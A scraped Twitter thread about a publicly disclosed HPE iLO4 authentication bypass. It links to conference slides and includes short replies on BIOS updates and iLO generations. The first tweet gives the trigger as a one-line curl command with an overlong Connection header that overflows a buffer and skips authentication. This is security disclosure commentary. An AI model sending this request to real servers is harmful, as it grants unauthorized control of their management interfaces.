HP iLO4 authentication bypass: curl -H "Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA" No, that's not a crash PoC. That's a full blown auth bypass. sscanf into fixed buffer overwrites a flag field that bypasses auth. Yes, really. https://airbus-seclab.github.io/ilo/SSTIC2018-Slides-EN-Backdooring_your_server_through_its_BMC_the_HPE_iLO4_case-perigaud-gazet-czarny.pdf …
-
-
Current BIOSes for most servers are also free, due to Spectre microcode updates.
-
This Tweet is unavailable.
- Show replies
New conversation -
-
-
btw, there are iLO4 (for Gen9 and older) and iLO5 (for Gen10)
-
Yes, and iLO3, and iLO2. But within each generation the firmware is the same across the entire product line.
End of conversation
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.